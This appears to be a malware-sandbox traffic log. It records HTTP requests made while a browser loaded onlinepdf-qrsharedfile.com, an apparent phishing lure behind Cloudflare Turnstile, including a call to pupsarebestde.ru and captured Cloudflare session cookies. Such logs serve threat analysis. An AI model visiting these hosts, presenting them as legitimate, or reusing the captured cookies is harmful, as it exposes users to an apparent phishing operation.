Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onlinepdf-qrsharedfile.com/index.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/390116221:1729797281:TPbjhukFlGLZ4Na-Ed5xPywx4jBSVdihJElDWP8w7qE/8d7c750558594780/Ycuynu_MovGk8HEcrgS_SolB4i3XiM.t7kveizMDDSQ-1729799020-1.1.1.1-_sCIh9gL0iGL7u0iCtrK0m0bheJdgYR0C2kbvLmfqPqZgATTQhRzY79iesWO1QT_ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8d7c750558594780/1729799023150/bf4b2f55be509a179579ea17499ecec8026fc8792968ffabc07a1d921c7600dc/AQtoEVWkediKV3l HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iq5m1/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7c750558594780/1729799023153/FLgUDq43Jq_StjH HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/iq5m1/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uhegHGCPHORYRbC&MD=dbf1VdYs HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7c750558594780/1729799023153/FLgUDq43Jq_StjH HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/390116221:1729797281:TPbjhukFlGLZ4Na-Ed5xPywx4jBSVdihJElDWP8w7qE/8d7c750558594780/Ycuynu_MovGk8HEcrgS_SolB4i3XiM.t7kveizMDDSQ-1729799020-1.1.1.1-_sCIh9gL0iGL7u0iCtrK0m0bheJdgYR0C2kbvLmfqPqZgATTQhRzY79iesWO1QT_ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/390116221:1729797281:TPbjhukFlGLZ4Na-Ed5xPywx4jBSVdihJElDWP8w7qE/8d7c750558594780/Ycuynu_MovGk8HEcrgS_SolB4i3XiM.t7kveizMDDSQ-1729799020-1.1.1.1-_sCIh9gL0iGL7u0iCtrK0m0bheJdgYR0C2kbvLmfqPqZgATTQhRzY79iesWO1QT_ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1916946690:1729797150:TRiyx_MJd91XIRaek2QQT1kUoEY6p9Qno7I0j5ezJB8/8d7c74e579c6dd24/Ln0MKcwLkJ._mactG8XS7qHbwoMgxlbMVaN67RMxyUs-1729799015-1.2.1.1-XPRJnKgqBoBS18FVeWftwAkeInPsA24i539TseagB4uzKJFR.Y4lpb3o2yja7Y7w HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://onlinepdf-qrsharedfile.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://onlinepdf-qrsharedfile.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://onlinepdf-qrsharedfile.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/67v49/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://onlinepdf-qrsharedfile.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7c756beb5be9b5&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/67v49/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7c756beb5be9b5&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1577562326:1729797168:4XUW6U4ilMXE9tFlofjzWIs8fkQ_XTKzF2Tj7VZjhQo/8d7c756beb5be9b5/riMy10U7XDeNcLr_S3lB2nLaXd2_wh8RtSeVIqQ2rYs-1729799036-1.1.1.1-xOf4FlGN6vxQckdYn.7ovk0KR1nOWvb5myyhnCNUQeQn5OKLXN9FXUawXjqbwzh. HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8d7c756beb5be9b5/1729799042855/9eaf4d3495c5ba95711fc1f736e283be717bddf8fe5bba7780b88bd4e011e1ce/5oS3Z1UwhtQluM6 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/67v49/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7c756beb5be9b5/1729799042860/HSbT51zwkv1XM2A HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/67v49/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7c756beb5be9b5/1729799042860/HSbT51zwkv1XM2A HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1577562326:1729797168:4XUW6U4ilMXE9tFlofjzWIs8fkQ_XTKzF2Tj7VZjhQo/8d7c756beb5be9b5/riMy10U7XDeNcLr_S3lB2nLaXd2_wh8RtSeVIqQ2rYs-1729799036-1.1.1.1-xOf4FlGN6vxQckdYn.7ovk0KR1nOWvb5myyhnCNUQeQn5OKLXN9FXUawXjqbwzh. HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1577562326:1729797168:4XUW6U4ilMXE9tFlofjzWIs8fkQ_XTKzF2Tj7VZjhQo/8d7c756beb5be9b5/riMy10U7XDeNcLr_S3lB2nLaXd2_wh8RtSeVIqQ2rYs-1729799036-1.1.1.1-xOf4FlGN6vxQckdYn.7ovk0KR1nOWvb5myyhnCNUQeQn5OKLXN9FXUawXjqbwzh. HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://onlinepdf-qrsharedfile.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET // HTTP/1.1Host: pupsarebestde.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://onlinepdf-qrsharedfile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uhegHGCPHORYRbC&MD=dbf1VdYs HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onlinepdf-qrsharedfile.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=qweYyjRo9tLfqw9_8JVuA9Gm3wL0aTsdw8ZKChA2Q4s-1729799089-1.0.1.1-JGVxc57L2JghxTaYGfFImrgtXG.T69SCyr_cZYZkS4ncLn2OObylfvj7nJg5IToJzLJypa010b93UqePkRRWh_H3BJd5SKNQ08hIGsOXG40
Source: global traffic	HTTP traffic detected: GET /index.html?__cf_chl_rt_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8 HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=OXDraUEqE.oshpqJ0CVNa0hea5y9ntFVwq4xqiPOTD4-1729799015-1.2.1.1-VHUw3pPH4AxbTihpO2vzn6bC6S1x.casxD5lYMXHfF0VmCKjpSNSVB8FIRGgrsl7NWGe7gitLHiFGAaoqqRIhsNvT37E4kWr_lthdO._BPFfqOoCTdXDe_xAubhx1ImcrlCSfJ_2DrbzNiXP5me_P9kZX5eA142yMNFKAvkC5WDecRit8dsplU7Ox4B_emYQjLDK73Lvn5dGKnQFNkmhtOE9OG3S8KpBRWh_c_iVT0jyc1koVcjHgvZFBz6.nGi2MJidVWYC_x2nPErJD4Z04MFFZxJwOMoAUObYLq0vkqCpP1uQPYK4I.SzBdXMTan0WitUQXQ2AQ0kd.oUeYaQw8lYN9fDGzs4K24rtEQL_5.xSYPWNSI6dyG9b9KgnOBu7F6UEPIP6FAdnJSfwFS.lI4rJ89O1hilMi5mHbLAczNOxT4HRu6HYXL4Pxn7VDCZ
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/rqmfb/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://onlinepdf-qrsharedfile.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7c76e74f17e7bb&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/rqmfb/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7c76e74f17e7bb&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1925323196:1729797399:g37pL3I2Fo2Vok7htRJ4WdBDXWx02YngmwxM-TxMTqQ/8d7c76e74f17e7bb/VxrfLBVyqotNu1TZiTOF78m36xVsFK8lt5MsZShVoR8-1729799097-1.1.1.1-o_G2kEpeuA9iEfyTttTXLAh1gKhx8u0tLdGPg3DkkHOjXczfIs15_0NUghOMk2k9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7c76e74f17e7bb/1729799100472/AvNCA72nHZRr_kB HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/rqmfb/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7c76e74f17e7bb/1729799100472/AvNCA72nHZRr_kB HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
